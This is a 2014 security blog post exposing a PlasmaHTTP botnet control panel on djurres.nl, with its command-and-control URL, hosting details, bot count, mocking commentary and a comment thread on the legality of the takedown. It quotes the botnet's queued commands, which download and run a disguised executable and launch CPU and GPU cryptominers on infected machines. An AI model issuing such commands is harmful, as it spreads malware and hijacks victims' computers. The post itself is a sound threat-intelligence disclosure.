Thursday, January 30, 2014

PlasmaHTTP botnet on djurres.nl

PlasmaHTTP botnet and other junk on djurres.nl.

Plasma bot is a Windows based malware using HTTP to communicate with Command & Control server. Its primary functions are stealing credentials and DDoS. Not very sophisticated, but it gets the job done for many skids.  

djurres.nl
185.28.23.63 - Hosting24 Servers, US
abuse@main-hosting.com

C&C:
hxxp://www.djurres.nl/plasma/cp.php?a=online

Login:



Main page:
~450 bots






Running commands:
bot.update http://djurres.nl/plasma/1-29-14.exe java-update.exe [X] 
miner.start http://djurres.nl/plasma/miner/CPUMiner.files *-a scrypt -o stratum+tcp://eu.multipool.us:7777 -O Djurres.2:x -t 4* [X] 
miner.gpu.start http://djurres.nl/plasma/miner/GPUMiner.files *-a scrypt -o stratum+tcp://eu.multipool.us:7777 -u Djurres.1 -p x -g yes* [X] 
wait [X]

Real Fact: Mining for Bitcoin has huge profit margins.
CPU and GPU ?!?! Woah bro. 1337.

DDoS? uber cool! 


Stats:


Password log:


Ok, now this is the pathetic part.
I almost felt bad taking this botnet down.

Yes, that is a directory called "A Hackers Folder"


His pet RAT collection:


And a library of eBooks on how to 'spread' his shitty public copy of Plasma bot. 


I thought I pulled a sample that the update script was running, but I guess not.

bot.update http://djurres.nl/plasma/1-29-14.exe java-update.exe [X] 

Its too late now anyway.





Xzibit says:
actually, you have some eBooks to read ... so sad.




2 comments:

  1. You talk a lot of trash when all you did is submit a takedown notice and illegally log into some guys server... I doubt this kid's botnet was really 450 bots, all those offline bots were probably killed since he maxed out their machines with mining BTC.

    ReplyDelete
    Replies
    1. Anonymous Bozo,

      1. Operating a botnet is clearly and definitely illegal. Depending upon the use of a botnet, to commit banking fraud for example, an admin would be breaking many laws all at once.

      2. To combat the problem, incidents must be reported to network operators and ISPs. If they had the ability and./or the resources to deal with these issues, we would not have these problems in the first place. They appreciate the help. They say, "Thank you very much."

      2a. Most network operators take this kind of abuse very seriously. Reporting abuse that results in action like a "take down" requires coordination and hard evidence. Evidence like screenshots and login credentials. There is nothing illegal about touching a server while working with the ISP or NOC that actually owns the server. This wasn't "some guys server" it was owned by a US company and leased out to him after he agreed with an acceptable usage policy. This assumes the box wasn't just hacked into, but I seriously doubt that.

      You are entitled to your opinion and I respect that. However, my heckling of these little degenerate punks should be the least of your worries.

      Delete